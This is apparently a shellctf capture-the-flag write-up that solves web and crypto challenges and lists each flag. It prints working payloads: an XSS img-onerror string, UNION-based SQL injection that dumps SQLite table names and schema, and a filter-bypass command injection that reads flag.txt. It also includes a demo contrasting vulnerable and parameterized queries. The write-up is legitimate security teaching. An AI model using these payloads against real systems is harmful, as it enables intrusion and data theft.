< WEB >
90% guessy, 10% challenge.
● [ Choosy ]
I found the word "script" is filtered. I could infer this problem is about an XSS exploit.
payload
<img%20src=%27%27%20onerror=alert(1)>
Flag
shellctf{50oom3_P4yL0aDS_aM0ng_Maaa4nnY}
● [ Extractor ]
The service consists of a "Register Page" and a "Login Page". I tried an SQL injection attack on the Login Page.
First, I didn't know what kind of SQL database this service uses, so I tried to find the SQL version. I succeeded with the payload below.
Payload : username' union select 1,sqlite_version(),3,4;--
Got it. I could see that this service uses an SQLite database. Next, I needed to check the name of the table this DB uses, so I checked the table name with SQL injection.
Payload : username' union select 1,tbl_name,3,4 from sqlite_master--
>> Result : Admins
Then, I needed to know the column count and the column names.
Payload : username' union select 1,sql,3,4 from sqlite_master--
>> Result : CREATE TABLE Admins ( id INTEGER PRIMARY KEY AUTOINCREMENT, user TEXT NOT NULL, pass TEXT NOT NULL, content TEXT NOT NULL )
Then, I could find the flag.
Flag
shellctf{Sql_1Nj3c7i0n_B45iC_XD}
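As an added example (not part of the original write-up or the challenge's code), the code below rebuilds the dumped Admins schema in an in-memory SQLite database and runs the table-name payload from above against an assumed string-built login query and against the same query with bound parameters. The function names, the query shape and the sample row are assumptions.

```python
import sqlite3

# Schema as dumped in the write-up; the inserted row is constructed sample data.
SCHEMA = """CREATE TABLE Admins (
    id INTEGER PRIMARY KEY AUTOINCREMENT,
    user TEXT NOT NULL, pass TEXT NOT NULL, content TEXT NOT NULL)"""

# Second payload from the write-up, reused here as a regression input.
PAYLOAD = "username' union select 1,tbl_name,3,4 from sqlite_master--"


def make_db():
    """Return an in-memory database holding one constructed account."""
    db = sqlite3.connect(":memory:")
    db.execute(SCHEMA)
    db.execute("INSERT INTO Admins (user, pass, content) VALUES (?, ?, ?)",
               ("alice", "constructed-password", "constructed-content"))
    return db


def login_vulnerable(db, username, password):
    """Assumed shape of the flawed handler: input is pasted into the SQL text,
    so a quote in the username ends the string literal and the rest is SQL."""
    query = ("SELECT id, user, pass, content FROM Admins "
             f"WHERE user = '{username}' AND pass = '{password}'")
    return db.execute(query).fetchall()


def login_hardened(db, username, password):
    """Same lookup with bound parameters: input is only ever compared as a value."""
    query = ("SELECT id, user, pass, content FROM Admins "
             "WHERE user = ? AND pass = ?")
    return db.execute(query, (username, password)).fetchall()


if __name__ == "__main__":
    db = make_db()
    # The UNION rows leak table names through the second column.
    print("vulnerable:", login_vulnerable(db, PAYLOAD, "x"))
    # The payload is treated as a literal user name, so nothing matches.
    print("hardened:  ", login_hardened(db, PAYLOAD, "x"))
    print("valid login:", login_hardened(db, "alice", "constructed-password"))
```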
● [ illusion ]
I entered some words in this service. I found that "ls", "cd", and "d .." are filtered. When these words exist, filtering that works like the replace function of PHP is activated. For example, when I entered "llss", the service deleted the filtered word, so the output was "ls".
I checked that the payload below was working.
Payload : ccdd.. ..;ls
>> Result : __init__.py\n Dockerfile\n templates\n static\n app.py
I searched for a few minutes and I could find the flag.
payload
ccdd.. ..;ccdd .. ..;cat flag.txt
Flag
shellctf{F1l73R5_C4n'T_Pr3v3N7_C0mM4nd_1nJeC71on}
● [ Colour Cookie ]
When I entered "123", the URL was like this.
I couldn't get any idea, so I checked the files in this system.
I found an extraordinary file, "base_cookie.css". I checked it. At the bottom of this file, there was a hint.
/* name="C0loR" */
I input C0loR in there, but it didn't show me the flag. So I used "C0loR" as a parameter. The main page said "Blue is my favorite color". So I entered it like this.
C0loR=blue
Flag
shellctf{C0ooooK13_W17h_c0ooorr3c7_Parr4m37er...}
● [ Doc holder ]
It's an upload service. When I upload a .pdf file, it shows "Yummy", and other files show "Not tasty". This service is related to PDF files. And Hint 2 says "Think from right to left". So I uploaded any file with a ".fdp" extension.
Flag
shellctf{R1ghtt_t0_l3ft_0verRiDe_1s_k3y}
< Crypto >
● [ Tweet ]
I searched for bird on the wire, and I found this link.
Flag
SHELL{WELOVESINGING}
● [ Tring Tring ]
From the description, I knew that it is Morse code.
https://www.dcode.fr/morse-code
The result of the decrypt is like "999 77 666 ... ". I thought this was a keypad, so I decrypted it.
Flag
SHELL{YOUCANREADMYSMS}
● [ OX9OR2 ]
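Exploit Code
#!/usr/bin/python3
# Read the ciphertext as raw bytes.
with open('crypt/OX9OR2/encrypted', 'rb') as fo:
    cy = fo.read()

def xor(msg, key):
    """XOR each byte of msg with the repeating key and return the text."""
    o = ''
    for i in range(len(msg)):
        o += chr(msg[i] ^ ord(key[i % len(key)]))
    return o

# Known plaintext: the flag starts with "SHELL{", so XORing it with the
# first six ciphertext bytes reveals the first six key characters.
key = ''
pl1 = "SHELL{"
for i in range(6):
    key += chr(ord(pl1[i]) ^ cy[i])
print(key)

# Full 9-character key, completed from the recovered prefix.
key = 'XORISCOOL'
print(xor(cy, key))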
Flag
SHELL{X0R_1S_R3VeR51BL3}